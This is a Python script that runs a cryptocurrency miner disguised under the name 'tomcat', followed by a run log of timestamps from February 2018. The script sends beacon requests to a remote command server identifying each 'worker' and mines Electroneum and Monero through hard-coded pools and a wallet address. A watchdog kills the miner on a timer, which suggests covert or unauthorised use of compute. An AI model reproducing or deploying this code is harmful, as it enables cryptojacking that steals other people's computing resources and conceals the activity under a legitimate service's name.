import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:28:08.026196
#2018-02-17 16:15:01.709738
#2018-02-17 18:04:02.244035
#2018-02-17 19:51:04.278037
#2018-02-17 21:39:02.366813
#2018-02-17 23:23:06.716307
#2018-02-18 01:12:07.730441
#2018-02-18 02:59:03.602769
#2018-02-18 04:48:05.881413
#2018-02-18 06:37:07.118969
#2018-02-18 08:26:04.138311
#2018-02-18 10:13:07.037247
#2018-02-18 11:59:04.308494
#2018-02-18 13:45:07.429104
#2018-02-18 15:36:01.451720
#2018-02-18 17:24:01.554853
#2018-02-18 19:12:04.708226
#2018-02-18 20:58:01.251546
#2018-02-18 22:43:01.755649
#2018-02-19 00:32:03.437601
#2018-02-19 02:17:07.365146
#2018-02-19 04:06:07.436496
#2018-02-19 05:50:07.650952
#2018-02-19 07:40:08.660423
#2018-02-19 09:29:08.407199
#2018-02-19 11:18:01.308804
#2018-02-19 13:06:02.069082
#2018-02-19 14:53:08.649029
#2018-02-19 16:42:07.832079
#2018-02-19 18:31:01.766338
#2018-02-19 20:17:05.111896
#2018-02-19 22:07:05.859482
#2018-02-19 23:54:05.523019
#2018-02-20 01:40:07.444909
#2018-02-20 03:28:06.317073
#2018-02-20 05:15:09.080528
#2018-02-20 06:59:04.428878
#2018-02-20 08:46:05.670555
#2018-02-20 10:30:09.389387
#2018-02-20 12:15:07.082420
#2018-02-20 14:04:04.072206
#2018-02-20 15:48:02.111170
#2018-02-20 17:35:13.183495
#2018-02-20 19:22:07.866022
#2018-02-20 21:11:05.636771
#2018-02-20 22:57:06.159415
#2018-02-21 00:39:05.140680
#2018-02-21 02:25:07.103744
#2018-02-21 04:13:05.878176
#2018-02-21 06:02:03.925266
#2018-02-21 07:50:09.279460
#2018-02-21 09:37:04.487560
#2018-02-21 11:25:10.715780
#2018-02-21 13:14:01.781367
#2018-02-21 15:01:03.933894
#2018-02-21 16:51:04.629573
#2018-02-21 18:42:01.515766
#2018-02-21 20:26:07.169634
#2018-02-21 22:16:04.691255
#2018-02-22 00:07:06.335354
#2018-02-22 01:55:09.395993
#2018-02-22 03:42:08.179173
#2018-02-22 05:29:01.428377
#2018-02-22 07:14:06.084558
#2018-02-22 09:02:01.475264
#2018-02-22 10:49:08.922309
#2018-02-22 12:35:09.113459
#2018-02-22 14:20:07.959784
#2018-02-22 16:08:01.810849
#2018-02-22 17:55:10.139700
#2018-02-22 19:46:02.026757
#2018-02-22 21:36:08.416784
#2018-02-22 23:23:07.104120
#2018-02-23 01:11:06.870950
#2018-02-23 02:59:07.440637
#2018-02-23 04:46:06.694796
#2018-02-23 06:30:05.601263
#2018-02-23 08:18:03.700177
#2018-02-23 10:36:06.058263
#2018-02-23 12:31:09.537283
#2018-02-23 14:18:08.698914
#2018-02-23 16:09:04.692229
#2018-02-23 17:55:07.646759
#2018-02-23 19:41:01.781168
#2018-02-23 21:25:05.717621
#2018-02-23 23:13:02.051404
#2018-02-24 01:03:02.155179
#2018-02-24 02:55:06.982400
#2018-02-24 04:45:08.126785
#2018-02-24 06:29:05.643449
#2018-02-24 08:18:05.941986
#2018-02-24 10:01:06.429356
#2018-02-24 11:58:06.523478
#2018-02-24 13:46:01.301980
#2018-02-24 15:44:07.053044
#2018-02-24 17:38:06.256290
#2018-02-24 19:24:01.332401
#2018-02-24 21:58:06.514073
#2018-02-25 02:33:06.321960
#2018-02-25 06:13:06.367306
#2018-02-25 11:40:08.179887